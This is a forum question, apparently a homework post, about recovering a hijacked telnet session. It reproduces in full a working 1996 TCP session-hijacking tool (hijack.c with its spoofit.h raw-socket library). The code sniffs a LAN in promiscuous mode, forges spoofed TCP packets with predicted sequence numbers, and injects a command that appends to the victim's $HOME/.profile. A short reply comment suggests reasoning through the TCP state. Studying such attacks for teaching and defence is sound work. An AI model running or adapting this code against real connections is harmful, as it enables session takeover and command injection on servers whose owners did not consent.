# How to restore a telnet session after being hijacked by a hacker?

Tags: c++, telnet

This is a class topic homework, I currently have some demonstration C++ codes(hijack.c) for hacker to hijack the telnet session in the LAN and implant some "evil code" in the telnet server.

The question is, for the telnet client, how to restore the telnet session instead of kill the PID by generating some large traffic? Only just need to modify some of the codes of the hijack.c.

```
/*---=[ hijack.c ]=-------------------------------------------------------*/
#include "spoofit.h"       /* My spoofing include.... read licence on this */

/* Those 2 'defines' are important for putting the receiving device in  */
/* PROMISCUOUS mode                                                     */
#define INTERFACE       "eth0"  /* first ethernet device          */
#define INTERFACE_PREFIX     14     /* 14 bytes is an ethernet header */

#define PERSONAL_TOUCH      666

int fd_receive, fd_send;
char CLIENT[100],SERVER[100];
int CLIENT_P;

void main(int argc, char *argv[]) 
{ 
int i,j,count;
struct sp_wait_packet attack_info;
unsigned long sp_seq ,sp_ack; 
unsigned long old_seq ,old_ack; 
unsigned long serv_seq ,serv_ack; 

/* This data used to clean up the shell line */
char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x0a, 0x0a};  /* Clear the command line that typed by the client */
char evil_data[]="echo \"echo HACKED\" >>$HOME/.profile\n";    /* Input the command that the hacker intends to type*/

if(argc!=4)
    {
    printf("Usage: %s client client_port server\n",argv[0]);        /* Check the input parameter format. */
    exit(1);
    }
strcpy(CLIENT,argv[1]);    /* copy the client ip address info from argv[1] to the Char variable CLIENT */
CLIENT_P=atoi(argv[2]);   /* Convert the String into Integer and save it to the Integer CLIENT_P */
strcpy(SERVER,argv[3]);   /* same as the first strcpy */

/* preparing all necessary sockets (sending + receiving) */    
DEV_PREFIX = INTERFACE_PREFIX;
fd_send = open_sending();        /* open_sending() is in the file called spoofit.h          
fd_receive = open_receiving(INTERFACE, 0);  /* normal BLOCKING mode */

printf("Starting Hijacking demo - Brecht Claerhout 1996\n");
printf("-----------------------------------------------\n");

for(j=0;j<50;j++)
  {
  printf("\nTakeover phase 1: Stealing connection.\n");
  wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0); /*Based on the info to capture the packet and reconstruct the bogus packet*/
  sp_seq=attack_info.seq+attack_info.datalen;   
  sp_ack=attack_info.ack;
  printf("  Sending Spoofed clean-up data...\n");
  transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,23,
                                                      sp_seq,sp_ack,ACK|PSH);                    /* Clear the command*/
/* NOTE: always beware you receive y'r OWN spoofed packs! */
/*       so handle it if necessary                         */
  count=0;
  printf("  Waiting for spoof to be confirmed...\n");
  while(count<5)
    {
        wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
        if(attack_info.ack==sp_seq+sizeof(to_data))
        count=PERSONAL_TOUCH;    /* PERSONAL_TOUCH = 666, In the previous define already. */
        else count++;
        };
  if(count!=PERSONAL_TOUCH)
        {printf("Phase 1 unsuccesfully ended.\n");}
  else {printf("Phase 1 ended.\n"); break;};
  };

printf("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n");
count=serv_seq=old_ack=0;
while(count<10)
    {
    old_seq=serv_seq;
    old_ack=serv_ack;
    wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0);
    if(attack_info.datalen==0)
      {
      serv_seq=attack_info.seq+attack_info.datalen;
      serv_ack=attack_info.ack;
          if( (old_seq==serv_seq)&&(serv_ack==old_ack) )
        count=PERSONAL_TOUCH;
      else count++;
          }
        };
if(count!=PERSONAL_TOUCH)
        {printf("Phase 2 unsuccesfully ended.\n"); exit(0);}  /* Time-out and abort immediately */
printf("  Server SEQ: %X (hex)    ACK: %X (hex)\n",serv_seq,serv_ack);
printf("Phase 2 ended.\n");

printf("\nTakeover phase 3: Sending MY data.\n");
printf("  Sending evil data.\n");
transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, 
         SERVER,23,serv_ack,serv_seq,ACK|PSH);          /* Send out the evil data*/
printf("  Waiting for evil data to be confirmed...\n");
while(count<5)
    {
        wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0);
        if(attack_info.ack==serv_ack+sizeof(evil_data))
        count=PERSONAL_TOUCH;
        else count++;
        };
if(count!=PERSONAL_TOUCH)
        {printf("Phase 3 unsuccesfully ended.\n"); exit(0);}
printf("Phase 3 ended.\n");

}




/*---=[ spoofit.h ]=------------------------------------------------------*/


#include "sys/socket.h"       /* includes, what would we do without them  */
#include "netdb.h"
#include "stdlib.h"
#include "unistd.h"
#include "stdio.h"
#include "errno.h"
#include "netinet/in.h"
#include "netinet/ip.h"
#include "linux/if.h"
#include "sys/ioctl.h"
#include "sys/types.h"
#include "signal.h"
#include "fcntl.h"

#undef  DEBUG 
#define IP_VERSION  4                 /* keep y'r hands off...         */
#define MTU         1500 
#define IP_HEAD_BASE    20                /* using fixed lengths to send   */ 
#define TCP_HEAD_BASE   20                /* no options etc...             */ 
#define UDP_HEAD_BASE   8                 /* Always fixed                  */ 

#define IO_HANDLE   1
#define IO_NONBLOCK 2

int DEV_PREFIX = 9999;      
sig_atomic_t WAIT_PACKET_WAIT_TIME=0;

/**** IO_HANDLE ************************************************************/
int rc_fd_abc123;
sig_atomic_t RC_FILTSET=0;
char rc_filter_string[50];                       /* x.x.x.x.p-y.y.y.y.g  */

sig_atomic_t SP_DATA_BUSY=0;
unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0;
unsigned int CUR_DATALEN;
unsigned short CUR_FLAGS;
/***************************************************************************/

struct sp_wait_packet
{
    unsigned long seq,ack;
    unsigned short flags;
    int datalen;
};

/* Code from Sniffit - BTW my own program.... no copyright violation here */ 
#define URG 32       /* TCP flags */
#define ACK 16 
#define PSH 8 
#define RST 4
#define SYN 2 
#define FIN 1 

struct PACKET_info
{
    int len, datalen;   
    unsigned long int seq_nr, ACK_nr;
    u_char FLAGS;
};

struct IP_header                        /* The IPheader (without options) */
{ 
        unsigned char verlen, type;
        unsigned short length, ID, flag_offset;
        unsigned char TTL, protocol;
        unsigned short checksum;
        unsigned long int source, destination;
};

struct TCP_header                     /* The TCP header (without options) */
{
        unsigned short source, destination;
        unsigned long int seq_nr, ACK_nr;
        unsigned short offset_flag, window, checksum, urgent;
};

struct UDP_header                                      /* The UDP header */
{
        unsigned short source, destination;
        unsigned short length, checksum;
};

struct pseudo_IP_header          /* The pseudo IP header (checksum calc) */ 
{
        unsigned long int source, destination;
    char zero_byte, protocol;
    unsigned short TCP_UDP_len;
};

/* data structure for argument passing  */

struct sp_data_exchange {
    int fd;                                /* Sh!t from transmit_TCP  */
    char *data; 
    int datalen;
    char *source; unsigned short source_port;
    char *dest;   unsigned short dest_port;
        unsigned long seq, ack; 
        unsigned short flags;

    char *buffer;               /* work buffer */

        int IP_optlen;         /* IP options length in bytes  */
        int TCP_optlen;        /* TCP options length in bytes */
    };

/**************** all functions  *******************************************/
void transmit_TCP (int fd, char *sp_data, 
                   int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,
                   char *sp_source, unsigned short sp_source_port,
               char *sp_dest, unsigned short sp_dest_port,
                           unsigned long sp_seq, unsigned long sp_ack, 
                           unsigned short sp_flags);

void transmit_UDP (int sp_fd, char *sp_data, 
               int  ipoptlen, int sp_datalen, 
                   char *sp_source, unsigned short sp_source_port,
               char *sp_dest, unsigned short sp_dest_port);

int get_packet (int rc_fd, char *buffer, int *, unsigned char*);
int wait_packet(int,struct sp_wait_packet *,char *, unsigned short,char *, unsigned short, int, int);

static unsigned long sp_getaddrbyname(char *);

int open_sending (void);
int open_receiving (char *, char);
void close_receiving (void);

void sp_send_packet (struct sp_data_exchange *, unsigned char);
void sp_fix_TCP_packet (struct sp_data_exchange *);
void sp_fix_UDP_packet (struct sp_data_exchange *);
void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char);
unsigned short in_cksum(unsigned short *, int );

void rc_sigio (int);
void set_filter (char *, unsigned short, char *, unsigned short);

/********************* let the games commence ****************************/

static unsigned long sp_getaddrbyname(char *sp_name)
{
struct hostent *sp_he;
int i;

if(isdigit(*sp_name))
  return inet_addr(sp_name);

for(i=0;i<100;i++)
     {
     if(!(sp_he = gethostbyname(sp_name)))
    {printf("WARNING: gethostbyname failure!\n");
    sleep(1);
    if(i>=3)       /* always a retry here in this kind of application */
       printf("Coudn't resolv hostname."), exit(1);
    }
     else break;
     }
return sp_he ? *(long*)*sp_he->h_addr_list : 0;
}

int open_sending (void)
{
struct protoent *sp_proto;   
int sp_fd;
int dummy=1;

/* they don't come rawer */
if ((sp_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1) 
        perror("Couldn't open Socket."), exit(1);

#ifdef DEBUG
    printf("Raw socket ready\n");
#endif
return sp_fd;
}

void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto)
{
int sp_status;
struct sockaddr_in sp_server;
struct hostent *sp_help;
int HEAD_BASE;

/* Construction of destination */
bzero((char *)&sp_server, sizeof(struct sockaddr)); 
sp_server.sin_family = AF_INET;
sp_server.sin_addr.s_addr = inet_addr(sp->dest); 
if (sp_server.sin_addr.s_addr == (unsigned int)-1)
        {                      /* if target not in DOT/number notation */ 
        if (!(sp_help=gethostbyname(sp->dest))) 
          fprintf(stderr,"unknown host %s\n", sp->dest), exit(1);
        bcopy(sp_help->h_addr, (caddr_t)&sp_server.sin_addr, sp_help->h_length);
        };

switch(proto)
    {
    case 6: HEAD_BASE = TCP_HEAD_BASE;  break;                  /* TCP */
    case 17: HEAD_BASE = UDP_HEAD_BASE; break;                  /* UDP */
    default: exit(1); break;
    };
sp_status = sendto(sp->fd, (char *)(sp->buffer), sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen, 0, 
            (struct sockaddr *)&sp_server,sizeof(struct sockaddr)); 
if (sp_status < 0 || sp_status != sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen)
        {
        if (sp_status < 0)
          perror("Sendto"), exit(1);
        printf("hmm... Only transmitted %d of %d bytes.\n", sp_status, 
                        sp->datalen+HEAD_BASE);
        };
#ifdef DEBUG
    printf("Packet transmitted...\n");
#endif
}

void sp_fix_IP_packet (struct sp_data_exchange *sp, unsigned char proto)
{ 
struct IP_header *sp_help_ip;
int HEAD_BASE;

switch(proto)
    {
    case 6: HEAD_BASE = TCP_HEAD_BASE;  break;                  /* TCP */
    case 17: HEAD_BASE = UDP_HEAD_BASE; break;                  /* UDP */
    default: exit(1); break;
    };

sp_help_ip = (struct IP_header *) (sp->buffer);
sp_help_ip->verlen = (IP_VERSION << 4) | ((IP_HEAD_BASE+sp->IP_optlen)/4);
sp_help_ip->type = 0;
sp_help_ip->length = htons(IP_HEAD_BASE+HEAD_BASE+sp->datalen+sp->IP_optlen+sp->TCP_optlen);
sp_help_ip->ID = htons(12545);                                  /* TEST */ 
sp_help_ip->flag_offset = 0;
sp_help_ip->TTL = 69;
sp_help_ip->protocol = proto;
sp_help_ip->source = sp_getaddrbyname(sp->source);
sp_help_ip->destination =  sp_getaddrbyname(sp->dest);
sp_help_ip->checksum=in_cksum((unsigned short *) (sp->buffer), 
                        IP_HEAD_BASE+sp->IP_optlen);
#ifdef DEBUG
    printf("IP header fixed...\n");
#endif
}

void sp_fix_TCP_packet (struct sp_data_exchange *sp)
{ 
char sp_pseudo_ip_construct[MTU];
struct TCP_header *sp_help_tcp;
struct pseudo_IP_header *sp_help_pseudo;
int i;

for(i=0;i<MTU;i++)
  {sp_pseudo_ip_construct[i]=0;}

sp_help_tcp = (struct TCP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;

sp_help_tcp->offset_flag = htons( (((TCP_HEAD_BASE+sp->TCP_optlen)/4)<<12) | sp->flags); 
sp_help_tcp->seq_nr = htonl(sp->seq);
sp_help_tcp->ACK_nr = htonl(sp->ack);
sp_help_tcp->source = htons(sp->source_port);
sp_help_tcp->destination = htons(sp->dest_port);
sp_help_tcp->window = htons(0x7c00);             /* dummy for now 'wujx' */

sp_help_pseudo->source = sp_getaddrbyname(sp->source);
sp_help_pseudo->destination =  sp_getaddrbyname(sp->dest);
sp_help_pseudo->zero_byte = 0;
sp_help_pseudo->protocol = 6;
sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+TCP_HEAD_BASE+sp->TCP_optlen);

memcpy(sp_pseudo_ip_construct+12, sp_help_tcp, sp->TCP_optlen+sp->datalen+TCP_HEAD_BASE);
sp_help_tcp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, 
                  sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen);
#ifdef DEBUG
    printf("TCP header fixed...\n");
#endif
}

void transmit_TCP (int sp_fd, char *sp_data, 
               int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, 
                   char *sp_source, unsigned short sp_source_port,
               char *sp_dest, unsigned short sp_dest_port,
                           unsigned long sp_seq, unsigned long sp_ack, 
                           unsigned short sp_flags)
{
char sp_buffer[1500];
struct sp_data_exchange sp_struct;

bzero(sp_buffer,1500);
if (sp_ipoptlen!=0) 
    memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);

if (sp_tcpoptlen!=0) 
    memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen,
                                sp_data+sp_ipoptlen,sp_tcpoptlen);
if (sp_datalen!=0) 
    memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen+sp_tcpoptlen,
            sp_data+sp_ipoptlen+sp_tcpoptlen,sp_datalen);

sp_struct.fd          = sp_fd; 
sp_struct.data        = sp_data;
sp_struct.datalen     = sp_datalen;
sp_struct.source      = sp_source;
sp_struct.source_port = sp_source_port;
sp_struct.dest        = sp_dest;
sp_struct.dest_port   = sp_dest_port;
sp_struct.seq         = sp_seq;
sp_struct.ack         = sp_ack;
sp_struct.flags       = sp_flags;
sp_struct.buffer      = sp_buffer;
sp_struct.IP_optlen   = sp_ipoptlen;          
sp_struct.TCP_optlen  = sp_tcpoptlen;          

sp_fix_TCP_packet(&sp_struct);
sp_fix_IP_packet(&sp_struct, 6);
sp_send_packet(&sp_struct, 6);
}

void sp_fix_UDP_packet (struct sp_data_exchange *sp)
{ 
char sp_pseudo_ip_construct[MTU];
struct UDP_header *sp_help_udp;
struct pseudo_IP_header *sp_help_pseudo;
int i;

for(i=0;i<MTU;i++)
  {sp_pseudo_ip_construct[i]=0;}

sp_help_udp = (struct UDP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;

sp_help_udp->source = htons(sp->source_port);
sp_help_udp->destination = htons(sp->dest_port);
sp_help_udp->length =  htons(sp->datalen+UDP_HEAD_BASE);

sp_help_pseudo->source = sp_getaddrbyname(sp->source);
sp_help_pseudo->destination =  sp_getaddrbyname(sp->dest);
sp_help_pseudo->zero_byte = 0;
sp_help_pseudo->protocol = 17;
sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+UDP_HEAD_BASE);

memcpy(sp_pseudo_ip_construct+12, sp_help_udp, sp->datalen+UDP_HEAD_BASE);
sp_help_udp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, 
                             sp->datalen+12+UDP_HEAD_BASE);
#ifdef DEBUG
    printf("UDP header fixed...\n");
#endif
}

void transmit_UDP (int sp_fd, char *sp_data, 
               int sp_ipoptlen, int sp_datalen, 
                   char *sp_source, unsigned short sp_source_port,
               char *sp_dest, unsigned short sp_dest_port)
{
char sp_buffer[1500];
struct sp_data_exchange sp_struct;

bzero(sp_buffer,1500);

if (sp_ipoptlen!=0) 
    memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
if (sp_data!=NULL) 
    memcpy(sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen,
                         sp_data+sp_ipoptlen,sp_datalen);
sp_struct.fd          = sp_fd; 
sp_struct.data        = sp_data;
sp_struct.datalen     = sp_datalen;
sp_struct.source      = sp_source;
sp_struct.source_port = sp_source_port;
sp_struct.dest        = sp_dest;
sp_struct.dest_port   = sp_dest_port;
sp_struct.buffer      = sp_buffer;
sp_struct.IP_optlen   = sp_ipoptlen;
sp_struct.TCP_optlen  = 0;

sp_fix_UDP_packet(&sp_struct);
sp_fix_IP_packet(&sp_struct, 17);
sp_send_packet(&sp_struct, 17);
}

/* This routine stolen from ping.c -- HAHAHA!*/
unsigned short in_cksum(unsigned short *addr,int len)
{
register int nleft = len;
register unsigned short *w = addr;
register int sum = 0;
unsigned short answer = 0;

while (nleft > 1)
        { 
        sum += *w++;
        nleft -= 2;
        }
if (nleft == 1)
        {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
        }
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

/************************* Receiving department  ****************************/

int open_receiving (char *rc_device, char mode)
{
int or_fd;
struct sigaction rc_sa;
int fcntl_flag;
struct ifreq ifinfo;
char test;

/* create snoop socket and set interface promisc */
if ((or_fd = socket(AF_INET, SOCK_PACKET, htons(0x3)))==-1) 
        perror("Couldn't open Socket."), exit(1);
strcpy(ifinfo.ifr_ifrn.ifrn_name,rc_device);
if(ioctl(or_fd,SIOCGIFFLAGS,&ifinfo)<0)
    perror("Couldn't get flags."), exit(1);
ifinfo.ifr_ifru.ifru_flags |= IFF_PROMISC;
if(ioctl(or_fd,SIOCSIFFLAGS,&ifinfo)<0)
    perror("Couldn't set flags. (PROMISC)"), exit(1);

if(mode&IO_HANDLE)
    {       /* install handler */
    rc_sa.sa_handler=rc_sigio;        /* we don't use signal()        */
    sigemptyset(&rc_sa.sa_mask);      /* because the timing window is */
    rc_sa.sa_flags=0;                 /* too big...                   */
    sigaction(SIGIO,&rc_sa,NULL);
    }

if(fcntl(or_fd,F_SETOWN,getpid())<0)
    perror("Couldn't set ownership"), exit(1);

if(mode&IO_HANDLE)
    {
    if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
        perror("Couldn't get FLAGS"), exit(1);
    if(fcntl(or_fd,F_SETFL,fcntl_flag|FASYNC|FNDELAY)<0)
        perror("Couldn't set FLAGS"), exit(1);
        rc_fd_abc123=or_fd;
    }
else 
    {
    if(mode&IO_NONBLOCK)
        {
        if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
            perror("Couldn't get FLAGS"), exit(1);
        if(fcntl(or_fd,F_SETFL,fcntl_flag|FNDELAY)<0)
            perror("Couldn't set FLAGS"), exit(1);
        };
    };

#ifdef DEBUG
    printf("Reading socket ready\n");
#endif
return or_fd;
}

/* returns 0 when no packet read!  */
int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,unsigned  char *proto) 
{
char help_buffer[MTU];
int pack_len;
struct IP_header *gp_IPhead;

pack_len = read(rc_fd,help_buffer,1500);
if(pack_len<0)
    {
    if(errno==EWOULDBLOCK) 
        {pack_len=0;}
    else
        {perror("Read error:"); exit(1);}
    };
if(pack_len>0)
    {
    pack_len -= DEV_PREFIX;
    memcpy(buffer,help_buffer+DEV_PREFIX,pack_len);
    gp_IPhead = (struct IP_header *) buffer;
    if(proto != NULL)
        *proto = gp_IPhead->protocol;
    if(TCP_UDP_start != NULL)
        *TCP_UDP_start = (gp_IPhead->verlen & 0xF) << 2;
    }
return pack_len;
}

void wait_packet_timeout (int sig)
{
alarm(0);
WAIT_PACKET_WAIT_TIME=1;
}

int wait_packet(int wp_fd,struct sp_wait_packet *ret_values,
                char *wp_source, unsigned short wp_source_port,
                char *wp_dest, unsigned short wp_dest_port, int wp_flags, 
        int wait_time) 
{
char wp_buffer[1500];
struct IP_header *wp_iphead;
struct TCP_header *wp_tcphead;
unsigned long wp_sourcel, wp_destl;
int wp_tcpstart;
char wp_proto;

wp_sourcel=sp_getaddrbyname(wp_source);
wp_destl=sp_getaddrbyname(wp_dest);

WAIT_PACKET_WAIT_TIME=0;
if(wait_time!=0)
    {
    signal(SIGALRM,wait_packet_timeout);
    alarm(wait_time);
    }   

while(1)
  {
  while(get_packet(wp_fd, wp_buffer, &wp_tcpstart, &wp_proto)<=0) 
    {
    if (WAIT_PACKET_WAIT_TIME!=0)   {alarm(0); return -1;}
    };
  if(wp_proto == 6)
    {
    wp_iphead= (struct IP_header *) wp_buffer;
    wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart);
    if( (wp_sourcel==wp_iphead->source)&&(wp_destl==wp_iphead->destination) )
      {
      if( (ntohs(wp_tcphead->source)==wp_source_port) &&
                               (ntohs(wp_tcphead->destination)==wp_dest_port) )
        {
        if( (wp_flags==0) || (ntohs(wp_tcphead->offset_flag)&wp_flags) )
          {
          ret_values->seq=ntohl(wp_tcphead->seq_nr);
          ret_values->ack=ntohl(wp_tcphead->ACK_nr);
          ret_values->flags=ntohs(wp_tcphead->offset_flag)&
                        (URG|ACK|PSH|FIN|RST|SYN);
          ret_values->datalen = ntohs(wp_iphead->length) -            
                           ((wp_iphead->verlen & 0xF) << 2) -
                            ((ntohs(wp_tcphead->offset_flag) & 0xF000) >> 10);
          alarm(0);
          return 0;
          }
        }
      }
    }
  }
/*impossible to get here.. but anyways*/
alarm(0); return -1;
}


void close_receiving (void)
{
close(rc_fd_abc123);
}

void rc_sigio (int sig)                     /* Packet handling routine */
{
char rc_buffer[1500];
char packet_id [50];
unsigned char *rc_so, *rc_dest;
struct IP_header *rc_IPhead;
struct TCP_header *rc_TCPhead;
int pack_len;

if(RC_FILTSET==0) return;

if(SP_DATA_BUSY!=0)              /* skip this packet */
    return;     

pack_len = read(rc_fd_abc123,rc_buffer,1500);
rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX);
if(rc_IPhead->protocol!=6) return;                          /* if not TCP */
rc_TCPhead = (struct TCP_header *) (rc_buffer + DEV_PREFIX + ((rc_IPhead->verlen & 0xF) << 2));

rc_so   = (unsigned char *) &(rc_IPhead->source);
rc_dest = (unsigned char *) &(rc_IPhead->destination);   
sprintf(packet_id,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
          rc_so[0],rc_so[1],rc_so[2],rc_so[3],ntohs(rc_TCPhead->source),
          rc_dest[0],rc_dest[1],rc_dest[2],rc_dest[3],ntohs(rc_TCPhead->destination)); 

if(strcmp(packet_id,rc_filter_string)==0)
    { 
    SP_DATA_BUSY=1;
    CUR_SEQ = ntohl(rc_TCPhead->seq_nr);
    CUR_ACK = ntohl(rc_TCPhead->ACK_nr);
        CUR_FLAGS = ntohs(rc_TCPhead->offset_flag);
    CUR_DATALEN = ntohs(rc_IPhead->length) - 
              ((rc_IPhead->verlen & 0xF) << 2) -
                      ((ntohs(rc_TCPhead->offset_flag) & 0xF000) >> 10);
    CUR_COUNT++;
    SP_DATA_BUSY=0;
    }
}

void set_filter (char *f_source, unsigned short f_source_port,
                 char *f_dest, unsigned short f_dest_port)
{
unsigned char *f_so, *f_des;
unsigned long f_sol, f_destl;

RC_FILTSET=0;
if(DEV_PREFIX==9999)
    fprintf(stderr,"DEV_PREFIX not set!\n"), exit(1);
f_sol   = sp_getaddrbyname(f_source);
f_destl = sp_getaddrbyname(f_dest);
f_so    = (unsigned char *) &f_sol;
f_des   = (unsigned char *) &f_destl;   
sprintf(rc_filter_string,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
                      f_so[0],f_so[1],f_so[2],f_so[3],f_source_port,    
                  f_des[0],f_des[1],f_des[2],f_des[3],f_dest_port); 
RC_FILTSET=1;
}
```

Comment: Do you understand how the attack works in the first place? If you understand that, then you should understand the state of the client after it's been hijacked. Then you can consider what it takes to get back to a working state. It might be difficult in a "normal" client due to not really operating on raw packets and kernel network stack becoming out of sync with the remote host. But, walk through what the hijack does, and reason through the state of your client's tcp connection when that happens.